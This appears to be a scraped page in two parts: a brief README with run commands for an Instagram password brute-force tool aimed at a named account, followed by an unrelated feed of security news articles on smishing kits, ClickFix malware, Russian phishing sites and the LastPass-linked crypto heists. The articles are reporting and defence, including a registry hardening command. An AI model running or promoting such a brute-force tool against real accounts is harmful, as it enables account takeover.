Compatible and Tested (GUI Supported Operating Systems Only)

Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161


☐ ☆ ✇ WIRED

Homeland Security Email Tells a US Citizen to ‘Immediately’ Self-Deport

By: Andrew Couts — April 13th 2025 at 01:35
An email sent by the Department of Homeland Security instructs people in the US on a temporary legal status to leave the country. But who the email actually applies to—and who actually received it—is far from clear.
☐ ☆ ✇ Krebs on Security

China-based SMS Phishing Triad Pivots to Banks

By: BrianKrebs — April 10th 2025 at 15:31

China-based purveyors of SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad” mainly impersonated toll road operators and shipping companies. But experts say these groups are now directly targeting customers of international financial institutions, while dramatically expanding their cybercrime infrastructure and support staff.

An image of an iPhone device farm shared on Telegram by one of the Smishing Triad members. Image: Prodaft.

If you own a mobile device, the chances are excellent that at some point in the past two years you’ve received at least one instant message that warns of a delinquent toll road fee, or a wayward package from the U.S. Postal Service (USPS). Those who click the promoted link are brought to a website that spoofs the USPS or a local toll road operator and asks for payment card information.

The site will then complain that the visitor’s bank needs to “verify” the transaction by sending a one-time code via SMS. In reality, the bank is sending that code to the mobile number on file for their customer because the fraudsters have just attempted to enroll that victim’s card details into a mobile wallet.

If the visitor supplies that one-time code, their payment card is then added to a new mobile wallet on an Apple or Google device that is physically controlled by the phishers. The phishing gangs typically load multiple stolen cards to digital wallets on a single Apple or Android device, and then sell those phones in bulk to scammers who use them for fraudulent e-commerce and tap-to-pay transactions.

A screenshot of the administrative panel for a smishing kit. On the left is the (test) data entered at the phishing site. On the right we can see the phishing kit has superimposed the supplied card number onto an image of a payment card. When the phishing kit scans that created card image into Apple or Google Pay, it triggers the victim’s bank to send a one-time code. Image: Ford Merrill.

The moniker “Smishing Triad” comes from Resecurity, which was among the first to report in August 2023 on the emergence of three distinct mobile phishing groups based in China that appeared to share some infrastructure and innovative phishing techniques. But it is a bit of a misnomer because the phishing lures blasted out by these groups are not SMS or text messages in the conventional sense.

Rather, they are sent via iMessage to Apple device users, and via RCS on Google Android devices. Thus, the missives bypass the mobile phone networks entirely and enjoy a near-100 percent delivery rate (at least until Apple and Google suspend the spammy accounts).

In a report published on March 24, the Swiss threat intelligence firm Prodaft detailed the rapid pace of innovation coming from the Smishing Triad, which it characterizes as a loosely federated group of Chinese phishing-as-a-service operators with names like Darcula, Lighthouse, and the Xinxin Group.

Prodaft said they’re seeing a significant shift in the underground economy, particularly among Chinese-speaking threat actors who have historically operated in the shadows compared to their Russian-speaking counterparts.

“Chinese-speaking actors are introducing innovative and cost-effective systems, enabling them to target larger user bases with sophisticated services,” Prodaft wrote. “Their approach marks a new era in underground business practices, emphasizing scalability and efficiency in cybercriminal operations.”

A new report from researchers at the security firm SilentPush finds the Smishing Triad members have expanded into selling mobile phishing kits targeting customers of global financial institutions like CitiGroup, MasterCard, PayPal, Stripe, and Visa, as well as banks in Canada, Latin America, Australia and the broader Asia-Pacific region.

Phishing lures from the Smishing Triad spoofing PayPal. Image: SilentPush.

SilentPush found the Smishing Triad now spoofs recognizable brands in a variety of industry verticals across at least 121 countries and a vast number of industries, including the postal, logistics, telecommunications, transportation, finance, retail and public sectors.

According to SilentPush, the domains used by the Smishing Triad are rotated frequently, with approximately 25,000 phishing domains active during any 8-day period and a majority of them sitting at two Chinese hosting companies: Tencent (AS132203) and Alibaba (AS45102).

“With nearly two-thirds of all countries in the world targeted by [the] Smishing Triad, it’s safe to say they are essentially targeting every country with modern infrastructure outside of Iran, North Korea, and Russia,” SilentPush wrote. “Our team has observed some potential targeting in Russia (such as domains that mentioned their country codes), but nothing definitive enough to indicate Russia is a persistent target. Interestingly, even though these are Chinese threat actors, we have seen instances of targeting aimed at Macau and Hong Kong, both special administrative regions of China.”

SilentPush’s Zach Edwards said his team found a vulnerability that exposed data from one of the Smishing Triad’s phishing pages, which revealed the number of visits each site received each day across thousands of phishing domains that were active at the time. Based on that data, SilentPush estimates those phishing pages received well more than a million visits within a 20-day time span.

The report notes the Smishing Triad boasts it has “300+ front desk staff worldwide” involved in one of their more popular phishing kits — Lighthouse — staff that is mainly used to support various aspects of the group’s fraud and cash-out schemes.

The Smishing Triad members maintain their own Chinese-language sales channels on Telegram, which frequently offer videos and photos of their staff hard at work. Some of those images include massive walls of phones used to send phishing messages, with human operators seated directly in front of them ready to receive any time-sensitive one-time codes.

As noted in February’s story How Phished Data Turns Into Apple and Google Wallets, one of those cash-out schemes involves an Android app called Z-NFC, which can relay a valid NFC transaction from one of these compromised digital wallets to anywhere in the world. For a $500 monthly subscription, the customer can wave their phone at any payment terminal that accepts Apple or Google Pay, and the app will relay an NFC transaction over the Internet from a stolen wallet on a phone in China.

Chinese nationals were recently busted trying to use these NFC apps to buy high-end electronics in Singapore. And in the United States, authorities in California and Tennessee arrested Chinese nationals accused of using NFC apps to fraudulently purchase gift cards from retailers.

The Prodaft researchers said they were able to find a previously undocumented backend management panel for Lucid, a smishing-as-a-service operation tied to the XinXin Group. The panel included victim figures that suggest the smishing campaigns maintain an average success rate of approximately five percent, with some domains receiving over 500 visits per week.

“In one observed instance, a single phishing website captured 30 credit card records from 550 victim interactions over a 7-day period,” Prodaft wrote.

Prodaft’s report details how the Smishing Triad has achieved such success in sending their spam messages. For example, one phishing vendor appears to send out messages using dozens of Android device emulators running in parallel on a single machine.

Phishers using multiple virtualized Android devices to orchestrate and distribute RCS-based scam campaigns. Image: Prodaft.

According to Prodaft, the threat actors first acquire phone numbers through various means including data breaches, open-source intelligence, or purchased lists from underground markets. They then exploit technical gaps in sender ID validation within both messaging platforms.

“For iMessage, this involves creating temporary Apple IDs with impersonated display names, while RCS exploitation leverages carrier implementation inconsistencies in sender verification,” Prodaft wrote. “Message delivery occurs through automated platforms using VoIP numbers or compromised credentials, often deployed in precisely timed multi-wave campaigns to maximize effectiveness.”

In addition, the phishing links embedded in these messages use time-limited single-use URLs that expire or redirect based on device fingerprinting to evade security analysis, they found.

“The economics strongly favor the attackers, as neither RCS nor iMessage messages incur per-message costs like traditional SMS, enabling high-volume campaigns at minimal operational expense,” Prodaft continued. “The overlap in templates, target pools, and tactics among these platforms underscores a unified threat landscape, with Chinese-speaking actors driving innovation in the underground economy. Their ability to scale operations globally and evasion techniques pose significant challenges to cybersecurity defenses.”

Ford Merrill works in security research at SecAlliance, a CSIS Security Group company. Merrill said he’s observed at least one video of a Windows binary that wraps a Chrome executable and can be used to load in target phone numbers and blast messages via RCS, iMessage, Amazon, Instagram, Facebook, and WhatsApp.

“The evidence we’ve observed suggests the ability for a single device to send approximately 100 messages per second,” Merrill said. “We also believe that there is capability to source country specific SIM cards in volume that allow them to register different online accounts that require validation with specific country codes, and even make those SIM cards available to the physical devices long-term so that services that rely on checks of the validity of the phone number or SIM card presence on a mobile network are thwarted.”

Experts say this fast-growing wave of card fraud persists because far too many financial institutions still default to sending one-time codes via SMS for validating card enrollment in mobile wallets from Apple or Google. KrebsOnSecurity interviewed multiple security executives at non-U.S. financial institutions who spoke on condition of anonymity because they were not authorized to speak to the press. Those banks have since done away with SMS-based one-time codes and are now requiring customers to log in to the bank’s mobile app before they can link their card to a digital wallet.

☐ ☆ ✇ Krebs on Security

Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe

By: BrianKrebs — April 4th 2025 at 16:37

A Minnesota cybersecurity and computer forensics expert whose testimony has featured in thousands of courtroom trials over the past 30 years is facing questions about his credentials and an inquiry from the Federal Bureau of Investigation (FBI). Legal experts say the inquiry could be grounds to reopen a number of adjudicated cases in which the expert’s testimony may have been pivotal.

One might conclude from reading Mr. Lanterman’s LinkedIn profile that he has a degree from Harvard University.

Mark Lanterman is a former investigator for the U.S. Secret Service Electronics Crimes Task Force who founded the Minneapolis consulting firm Computer Forensic Services (CFS). The CFS website says Lanterman’s 30-year career has seen him testify as an expert in more than 2,000 cases, with experience in cases involving sexual harassment and workplace claims, theft of intellectual property and trade secrets, white-collar crime, and class action lawsuits.

Or at least it did until last month, when Lanterman’s profile and work history were quietly removed from the CFS website. The removal came after the Hennepin County Attorney’s Office said it was notifying parties to ten pending cases that it was unable to verify Lanterman’s educational and employment background. The county attorney also said the FBI is now investigating the allegations.

Those allegations were raised by Sean Harrington, an attorney and forensics examiner based in Prescott, Wisconsin. Harrington alleged that Lanterman lied under oath in court on multiple occasions when he testified that he has a Bachelor of Science and a Master’s degree in computer science from the now-defunct Upsala College, and that he completed his postgraduate work in cybersecurity at Harvard University.

Harrington’s claims gained steam thanks to digging by the law firm Perkins Coie LLP, which is defending a case wherein a client’s laptop was forensically reviewed by Lanterman. On March 14, Perkins Coie attorneys asked the judge (PDF) to strike Lanterman’s testimony because neither he nor they could substantiate claims about his educational background.

Upsala College, located in East Orange, N.J., operated for 102 years until it closed in 1995 after a period of declining enrollment and financial difficulties. Perkins Coie told the court that they’d visited Felician University, which holds the transcripts for Upsala College during the years Lanterman claimed to have earned undergraduate and graduate degrees. The law firm said Felician had no record of transcripts for Lanterman (PDF), and that his name was absent from all of the Upsala College student yearbooks and commencement programs during that period.

Reached for comment, Lanterman acknowledged he had no way to prove he attended Upsala College, and that his “postgraduate work” at Harvard was in fact an eight-week online cybersecurity class called HarvardX, which cautions that its certificates should not be considered equivalent to a Harvard degree or a certificate earned through traditional, in-person programs at Harvard University.

Lanterman has testified that his first job after college was serving as a police officer in Springfield Township, Pennsylvania, although the Perkins Coie attorneys noted that this role was omitted from his resume. The attorneys said when they tried to verify Lanterman’s work history, “the police department responded with a story that would be almost impossible to believe if it was not corroborated by Lanterman’s own email communications.”

As recounted in the March 14 filing, Lanterman was deposed on Feb. 11, and the following day he emailed the Springfield Township Police Department to see if he could have a peek at his old personnel file. On Feb. 14, Lanterman visited the Springfield Township PD and asked to borrow his employment record. He told the officer he spoke with on the phone that he’d recently been instructed to “get his affairs in order” after being diagnosed with a grave heart condition, and that he wanted his old file to show his family about his early career.

According to Perkins Coie, Lanterman left the Springfield Township PD with his personnel file, and has not returned it as promised.

“It is shocking that an expert from Minnesota would travel to suburban Philadelphia and abscond with his decades-old personnel file to obscure his background,” the law firm wrote. “That appears to be the worst and most egregious form of spoliation, and the deception alone is reason enough to exclude Lanterman and consider sanctions.”

Harrington initially contacted KrebsOnSecurity about his concerns in late 2023, fuming after sitting through a conference speech in which Lanterman shared documents from a ransomware victim and told attendees it was because they’d refused to hire his company to perform a forensic investigation on a recent breach.

“He claims he was involved in the Martha Stewart investigation, the Bernie Madoff trial, Paul McCartney’s divorce, the Tom Petters investigation, the Denny Hecker investigation, and many others,” Harrington said. “He claims to have been invited to speak to the Supreme Court, claims to train the ‘entire federal judiciary’ on cybersecurity annually, and is a faculty member of the United States Judicial Conference and the Judicial College — positions which he obtained, in part, on a house of fraudulent cards.”

In an interview this week, Harrington said court documents reveal that at least two of Lanterman’s previous clients complained CFS had held their data for ransom over billing disputes. In a declaration (PDF) dated August 2022, the co-founder of the law firm MoreLaw Minneapolis LLC said she hired Lanterman in 2014 to examine several electronic devices after learning that one of their paralegals had a criminal fraud history.

But the law firm said when it pushed back on a consulting bill that was far higher than expected, Lanterman told them CFS would “escalate” its collection efforts if they didn’t pay, including “a claim and lien against the data which will result in a public auction of your data.”

“All of us were flabbergasted by Mr. Lanterman’s email,” wrote MoreLaw co-founder Kimberly Hanlon. “I had never heard of any legitimate forensic company threatening to ‘auction’ off an attorney’s data, particularly knowing that the data is comprised of confidential client data, much of which is sensitive in nature.”

In 2009, a Wisconsin-based manufacturing company that had hired Lanterman for computer forensics balked at paying an $86,000 invoice from CFS, calling it “excessive and unsubstantiated.” The company told a Hennepin County court that on April 15, 2009, CFS conducted an auction of its trade secret information in violation of their confidentiality agreement.

“CFS noticed and conducted a Public Sale of electronic information that was entrusted to them pursuant to the terms of the engagement agreement,” the company wrote. “CFS submitted the highest bid at the Public Sale in the amount of $10,000.”

Lanterman briefly responded to a list of questions about his background (and recent heart diagnosis) on March 24, saying he would send detailed replies the following day. Those replies never materialized. Instead, Lanterman forwarded a recent memo he wrote to the court that attacked Harrington and said his accuser was only trying to take out a competitor. He has not responded to further requests for comment.

“When I attended Upsala, I was a commuter student who lived with my grandparents in Morristown, New Jersey approximately 30 minutes away from Upsala College,” Lanterman explained to the judge (PDF) overseeing a separate ongoing case (PDF) in which he has testified. “With limited resources, I did not participate in campus social events, nor did I attend graduation ceremonies. In 2023, I confirmed with Felician University — which maintains Upsala College’s records — that they could not locate my transcripts or diploma, a situation that they indicated was possibly due to unresolved money-related issues.”

Lanterman was ordered to appear in court on April 3 in the case defended by Perkins Coie, but he did not show up. Instead, he sent a message to the judge withdrawing from the case.

“I am 60 years old,” Lanterman told the judge. “I created my business from nothing. I am done dealing with the likes of individuals like Sean Harrington. And quite frankly, I have been planning at turning over my business to my children for years. That time has arrived.”

Lanterman’s letter leaves the impression that it was his decision to retire. But according to an affidavit (PDF) filed in a Florida case on March 28, Mark Lanterman’s son Sean said he’d made the difficult decision to ask his dad to step down given all the negative media attention.

Mark Rasch, a former federal cybercrime prosecutor who now serves as counsel to the New York cybersecurity intelligence firm Unit 221B, said that if an expert witness is discredited, any defendants who lost cases that were strongly influenced by that expert’s conclusions at trial could have grounds for appeal.

Rasch said law firms who propose an expert witness have a duty in good faith to vet that expert’s qualifications, knowing that those credentials will be subject to cross-examination.

“Federal rules of civil procedure and evidence both require experts to list every case they have testified in as an expert for the past few years,” Rasch said. “Part of that due diligence is pulling up the results of those cases and seeing what the nature of their testimony has been.”

Perhaps the most well-publicized case involving significant forensic findings from Lanterman was the 2018 conviction of Stephen Allwine, who was found guilty of killing his wife two years earlier after attempts at hiring a hitman on the dark net fell through. Allwine is serving a sentence of life in prison, and continues to maintain that he was framed, casting doubt on computer forensic evidence found on 64 electronic devices taken from his home.

On March 24, Allwine petitioned a Minnesota court (PDF) to revisit his case, citing the accusations against Lanterman and his role as a key witness for the prosecution.

☐ ☆ ✇ Security – Cisco Blog

Mobile World Congress 2025: SOC in the Network Operations Center

By: Filipe Lopes — April 3rd 2025 at 12:00
Cisco is the sole supplier of network services to Mobile World Congress, expanding into security and observability, with Splunk.
☐ ☆ ✇ Krebs on Security

When Getting Phished Puts You in Mortal Danger

By: BrianKrebs — March 27th 2025 at 16:39

Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you your freedom or your life.

The real website of the Ukrainian paramilitary group “Freedom of Russia” legion. The text has been machine-translated from Russian.

Researchers at the security firm Silent Push mapped a network of several dozen phishing domains that spoof the recruitment websites of Ukrainian paramilitary groups, as well as Ukrainian government intelligence sites.

The website legiohliberty[.]army features a carbon copy of the homepage for the Freedom of Russia Legion (a.k.a. “Free Russia Legion”), a three-year-old Ukraine-based paramilitary unit made up of Russian citizens who oppose Vladimir Putin and his invasion of Ukraine.

The phony version of that website copies the legitimate site — legionliberty[.]army — providing an interactive Google Form where interested applicants can share their contact and personal details. The form asks visitors to provide their name, gender, age, email address and/or Telegram handle, country, citizenship, experience in the armed forces; political views; motivations for joining; and any bad habits.

“Participation in such anti-war actions is considered illegal in the Russian Federation, and participating citizens are regularly charged and arrested,” Silent Push wrote in a report released today. “All observed campaigns had similar traits and shared a common objective: collecting personal information from site-visiting victims. Our team believes it is likely that this campaign is the work of either Russian Intelligence Services or a threat actor with similarly aligned motives.”

Silent Push’s Zach Edwards said the fake Legion Liberty site shared multiple connections with rusvolcorps[.]net. That domain mimics the recruitment page for a Ukrainian far-right paramilitary group called the Russian Volunteer Corps (rusvolcorps[.]com), and uses a similar Google Forms page to collect information from would-be members.

Other domains Silent Push connected to the phishing scheme include: ciagov[.]icu, which mirrors the content on the official website of the U.S. Central Intelligence Agency; and hochuzhitlife[.]com, which spoofs the Ministry of Defense of Ukraine & General Directorate of Intelligence (whose actual domain is hochuzhit[.]com).

According to Edwards, there are no signs that these phishing sites are being advertised via email. Rather, it appears those responsible are promoting them by manipulating the search engine results shown when someone searches for one of these anti-Putin organizations.

In August 2024, security researcher Artem Tamoian posted on Twitter/X about how he received startlingly different results when he searched for “Freedom of Russia legion” in Russia’s largest domestic search engine Yandex versus Google.com. The top result returned by Google was the legion’s actual website, while the first result on Yandex was a phishing page targeting the group.

“I think at least some of them are surely promoted via search,” Tamoian said of the phishing domains. “My first thread on that accuses Yandex, but apart from Yandex those websites are consistently ranked above legitimate in DuckDuckGo and Bing. Initially, I didn’t realize the scale of it. They keep appearing to this day.”

Tamoian, a native Russian who left the country in 2019, is the founder of the cyber investigation platform malfors.com. He recently discovered two other sites impersonating the Ukrainian paramilitary groups — legionliberty[.]world and rusvolcorps[.]ru — and reported both to Cloudflare. When Cloudflare responded by blocking the sites with a phishing warning, the real Internet address of these sites was exposed as belonging to a known “bulletproof hosting” network called Stark Industries Solutions Ltd.

Stark Industries Solutions appeared two weeks before Russia invaded Ukraine in February 2022, materializing out of nowhere with hundreds of thousands of Internet addresses in its stable — many of them originally assigned to Russian government organizations. In May 2024, KrebsOnSecurity published a deep dive on Stark, which has repeatedly been used to host infrastructure for distributed denial-of-service (DDoS) attacks, phishing, malware and disinformation campaigns from Russian intelligence agencies and pro-Kremlin hacker groups.

In March 2023, Russia’s Supreme Court designated the Freedom of Russia legion as a terrorist organization, meaning that Russians caught communicating with the group could face between 10 and 20 years in prison.

Tamoian said those searching online for information about these paramilitary groups have become easy prey for Russian security services.

“I started looking into those phishing websites, because I kept stumbling upon news that someone gets arrested for trying to join [the] Ukrainian Army or for trying to help them,” Tamoian told KrebsOnSecurity. “I have also seen reports [of] FSB contacting people impersonating Ukrainian officers, as well as using fake Telegram bots, so I thought fake websites might be an option as well.”

Search results showing news articles about people in Russia being sentenced to lengthy prison terms for attempting to aid Ukrainian paramilitary groups.

Tamoian said reports surface regularly in Russia about people being arrested for trying to carry out an action requested by a “Ukrainian recruiter,” with the courts unfailingly imposing harsh sentences regardless of the defendant’s age.

“This keeps happening regularly, but usually there are no details about how exactly the person gets caught,” he said. “All cases related to state treason [and] terrorism are classified, so there are barely any details.”

Tamoian said while he has no direct evidence linking any of the reported arrests and convictions to these phishing sites, he is certain the sites are part of a larger campaign by the Russian government.

“Considering that they keep them alive and keep spawning more, I assume it might be an efficient thing,” he said. “They are on top of DuckDuckGo and Yandex, so it unfortunately works.”

Further reading: Silent Push report, Russian Intelligence Targeting its Citizens and Informants.

☐ ☆ ✇ Security – Cisco Blog

The Benefits of a Broad and Open Integration Ecosystem

By: Ben Greenbaum — March 26th 2025 at 12:00
Since inception, Cisco XDR has followed the Open XDR philosophy. We integrate telemetry and data from dozens of Cisco and third-party security solutions.
☐ ☆ ✇ Krebs on Security

ClickFix: How to Infect Your PC in Three Easy Steps

By: BrianKrebs — March 14th 2025 at 22:15

A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed “ClickFix,” the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.

ClickFix attacks mimic the “Verify You are a Human” tests that many websites use to separate real visitors from content-scraping bots. This particular scam usually starts with a website popup that looks something like this:

This malware attack pretends to be a CAPTCHA intended to separate humans from bots.

Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity.

Executing this series of keypresses prompts Windows to download password-stealing malware.

Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.

Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard.

Step 3 — pressing the “Enter” key — causes Windows to download and launch malicious code through “mshta.exe,” a Windows program designed to run Microsoft HTML application files.

“This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT,” Microsoft wrote in a blog post on Thursday. “Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.”

According to Microsoft, hospitality workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. The company said attackers have been sending malicious emails impersonating Booking.com, often referencing negative guest reviews, requests from prospective guests, or online promotion opportunities — all in a bid to convince people to step through one of these ClickFix attacks.

In November 2024, KrebsOnSecurity reported that hundreds of hotels that use booking.com had been subject to targeted phishing attacks. Some of those lures worked, and allowed thieves to gain control over booking.com accounts. From there, they sent out phishing messages asking for financial information from people who’d just booked travel through the company’s app.

Earlier this month, the security firm Arctic Wolf warned about ClickFix attacks targeting people working in the healthcare sector. The company said those attacks leveraged malicious code stitched into the widely used physical therapy video site HEP2go that redirected visitors to a ClickFix prompt.

An alert (PDF) released in October 2024 by the U.S. Department of Health and Human Services warned that the ClickFix attack can take many forms, including fake Google Chrome error pages and popups that spoof Facebook.

ClickFix tactic used by malicious websites impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA. Source: Sekoia.

The ClickFix attack — and its reliance on mshta.exe — is reminiscent of phishing techniques employed for years that hid exploits inside Microsoft Office macros. Malicious macros became such a common malware threat that Microsoft was forced to start blocking macros by default in Office documents that try to download content from the web.

Alas, the email security vendor Proofpoint has documented plenty of ClickFix attacks via phishing emails that include HTML attachments spoofing Microsoft Office files. When opened, the attachment displays an image of a Microsoft Word document with a pop-up error message directing users to click the “Solution” or “How to Fix” button.

HTML files containing ClickFix instructions. Examples for attachments named “Report_” (on the left) and “scan_doc_” (on the right). Image: Proofpoint.

Organizations that wish to do so can take advantage of Microsoft Group Policy restrictions to prevent Windows from executing the “run” command when users hit the Windows key and the “R” key simultaneously.
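For example, that restriction maps to a per-user Explorer policy value in the Windows registry. The command below is a minimal sketch assuming the standard "NoRun" policy value, which disables the Run dialog (including the Windows key + "R" shortcut); test the impact on administrators and power users before deploying it broadly:

:: Disable the Run dialog for the current user (applies at next logon).
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f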

☐ ☆ ✇ WIRED

The Violent Rise of ‘No Lives Matter’

By: Ali Winston — March 12th 2025 at 16:50
“No Lives Matter” has emerged in recent months as a particularly violent splinter group within the extremist crime network known as Com and 764, and experts are at a loss for how to stop its spread.
☐ ☆ ✇ Krebs on Security

Alleged Co-Founder of Garantex Arrested in India

By: BrianKrebs — March 11th 2025 at 16:49

Authorities in India today arrested the alleged co-founder of Garantex, a cryptocurrency exchange sanctioned by the U.S. government in 2022 for facilitating tens of billions of dollars in money laundering by transnational criminal and cybercriminal organizations. Sources close to the investigation told KrebsOnSecurity the Lithuanian national Aleksej Besciokov, 46, was apprehended while vacationing on the coast of India with his family.

Aleksej Bešciokov, “proforg,” “iram”. Image: U.S. Secret Service.

On March 7, the U.S. Department of Justice (DOJ) unsealed an indictment against Besciokov and the other alleged co-founder of Garantex, Aleksandr Mira Serda, 40, a Russian national living in the United Arab Emirates.

Launched in 2019, Garantex was first sanctioned by the U.S. Treasury Office of Foreign Assets Control in April 2022 for receiving hundreds of millions in criminal proceeds, including funds used to facilitate hacking, ransomware, terrorism and drug trafficking. Since those penalties were levied, Garantex has processed more than $60 billion, according to the blockchain analysis company Elliptic.

“Garantex has been used in sanctions evasion by Russian elites, as well as to launder proceeds of crime including ransomware, darknet market trade and thefts attributed to North Korea’s Lazarus Group,” Elliptic wrote in a blog post. “Garantex has also been implicated in enabling Russian oligarchs to move their wealth out of the country, following the invasion of Ukraine.”

The DOJ alleges Besciokov was Garantex’s primary technical administrator and responsible for obtaining and maintaining critical Garantex infrastructure, as well as reviewing and approving transactions. Mira Serda is allegedly Garantex’s co-founder and chief commercial officer.

Image: elliptic.co

In conjunction with the release of the indictments, German and Finnish law enforcement seized servers hosting Garantex’s operations. A “most wanted” notice published by the U.S. Secret Service states that U.S. authorities separately obtained earlier copies of Garantex’s servers, including customer and accounting databases. Federal investigators say they also froze over $26 million in funds used to facilitate Garantex’s money laundering activities.

Besciokov was arrested within the past 24 hours while vacationing with his family in Varkala, a major coastal city in the southwest Indian state of Kerala. An officer with the local police department in Varkala confirmed Besciokov’s arrest, and said the suspect will appear in a Delhi court on March 14 to face charges.

Varkala Beach in Kerala, India. Image: Shutterstock, Dmitry Rukhlenko.

The DOJ’s indictment says Besciokov went by the hacker handle “proforg.” This nickname corresponds to the administrator of a 20-year-old Russian language forum dedicated to nudity and crudity called “udaff.”

Besciokov and Mira Serda are each charged with one count of conspiracy to commit money laundering, which carries a maximum sentence of 20 years in prison. Besciokov is also charged with one count of conspiracy to violate the International Emergency Economic Powers Act—which also carries a maximum sentence of 20 years in prison—and with conspiracy to operate an unlicensed money transmitting business, which carries a maximum sentence of five years in prison.

☐ ☆ ✇ Krebs on Security

Feds Link $150M Cyberheist to 2022 LastPass Hacks

By: BrianKrebs — March 8th 2025 at 01:20

In September 2023, KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022. In a court filing this week, U.S. federal agents investigating a spectacular $150 million cryptocurrency heist said they had reached the same conclusion.

On March 6, federal prosecutors in northern California said they seized approximately $24 million worth of cryptocurrencies that were clawed back following a $150 million cyberheist on Jan. 30, 2024. The complaint refers to the person robbed only as “Victim-1,” but according to blockchain security researcher ZachXBT the theft was perpetrated against Chris Larsen, the co-founder of the cryptocurrency platform Ripple. ZachXBT was the first to report on the heist.

This week’s action by the government merely allows investigators to officially seize the frozen funds. But there is an important conclusion in this seizure document: It basically says the U.S. Secret Service and the FBI agree with the findings of the LastPass breach story published here in September 2023.

That piece quoted security researchers who said they were witnessing six-figure crypto heists several times each month that all appeared to be the result of crooks cracking master passwords for the password vaults stolen from LastPass in 2022.

“The Federal Bureau of Investigation has been investigating these data breaches, and law enforcement agents investigating the instant case have spoken with FBI agents about their investigation,” reads the seizure complaint, which was written by a U.S. Secret Service agent. “From those conversations, law enforcement agents in this case learned that the stolen data and passwords that were stored in several victims’ online password manager accounts were used to illegally, and without authorization, access the victims’ electronic accounts and steal information, cryptocurrency, and other data.”

The document continues:

“Based on this investigation, law enforcement had probable cause to believe the same attackers behind the above-described commercial online password manager attack used a stolen password held in Victim 1’s online password manager account and, without authorization, accessed his cryptocurrency wallet/account.”

Working with dozens of victims, security researchers Nick Bax and Taylor Monahan found that none of the six-figure cyberheist victims appeared to have suffered the sorts of attacks that typically preface a high-dollar crypto theft, such as the compromise of one’s email and/or mobile phone accounts, or SIM-swapping attacks.

They discovered the victims all had something else in common: Each had at one point stored their cryptocurrency seed phrase — the secret code that lets anyone gain access to your cryptocurrency holdings — in the “Secure Notes” area of their LastPass account prior to the 2022 breaches at the company.

Bax and Monahan found another common theme with these robberies: They all followed a similar pattern of cashing out, rapidly moving stolen funds to a dizzying number of drop accounts scattered across various cryptocurrency exchanges.

According to the government, a similar level of complexity was present in the $150 million heist against the Ripple co-founder last year.

“The scale of a theft and rapid dissipation of funds would have required the efforts of multiple malicious actors, and was consistent with the online password manager breaches and attack on other victims whose cryptocurrency was stolen,” the government wrote. “For these reasons, law enforcement agents believe the cryptocurrency stolen from Victim 1 was committed by the same attackers who conducted the attack on the online password manager, and cryptocurrency thefts from other similarly situated victims.”

Reached for comment, LastPass said it has seen no definitive proof — from federal investigators or others — that the cyberheists in question were linked to the LastPass breaches.

“Since we initially disclosed this incident back in 2022, LastPass has worked in close cooperation with multiple representatives from law enforcement,” LastPass said in a written statement. “To date, our law enforcement partners have not made us aware of any conclusive evidence that connects any crypto thefts to our incident. In the meantime, we have been investing heavily in enhancing our security measures and will continue to do so.”

On August 25, 2022, LastPass CEO Karim Toubba told users the company had detected unusual activity in its software development environment, and that the intruders stole some source code and proprietary LastPass technical information. On Sept. 15, 2022, LastPass said an investigation into the August breach determined the attacker did not access any customer data or password vaults.

But on Nov. 30, 2022, LastPass notified customers about another, far more serious security incident that the company said leveraged data stolen in the August breach. LastPass disclosed that criminal hackers had compromised encrypted copies of some password vaults, as well as other personal information.

Experts say the breach would have given thieves “offline” access to encrypted password vaults, theoretically allowing them all the time in the world to try to crack some of the weaker master passwords using powerful systems that can attempt millions of password guesses per second.

Researchers found that many of the cyberheist victims had chosen master passwords with relatively low complexity, and were among LastPass’s oldest customers. That’s because legacy LastPass users were more likely to have master passwords that were protected with far fewer “iterations,” which refers to the number of times your password is run through the company’s encryption routines. In general, the more iterations, the longer it takes an offline attacker to crack your master password.
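The arithmetic is easy to demonstrate. The Python sketch below times a single PBKDF2-SHA256 derivation (the general class of key derivation LastPass has described) at a legacy-style iteration count versus a modern one; the specific counts shown are illustrative. Every extra factor of N in iterations multiplies an attacker’s per-guess cost, and thus total cracking time, by roughly N.

import hashlib
import time

def derive(password: str, salt: bytes, iterations: int) -> bytes:
    # PBKDF2-HMAC-SHA256: the work factor scales linearly with iterations.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

for iterations in (5_000, 600_000):  # illustrative legacy vs. modern counts
    start = time.perf_counter()
    derive("correct horse battery staple", b"user@example.com", iterations)
    elapsed = time.perf_counter() - start
    print(f"{iterations:>7,} iterations: {elapsed * 1000:6.1f} ms per guess")

An attacker capable of millions of guesses per second against a low-iteration vault achieves only a small fraction of that rate against a high-iteration one, which is why the oldest, least-protected accounts were the ones being emptied.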

Over the years, LastPass forced new users to pick longer and more complex master passwords, and they increased the number of iterations on multiple occasions by several orders of magnitude. But researchers found strong indications that LastPass never succeeded in upgrading many of its older customers to the newer password requirements and protections.

Asked about LastPass’s continuing denials, Bax said that after the initial warning in our 2023 story, he naively hoped people would migrate their funds to new cryptocurrency wallets.

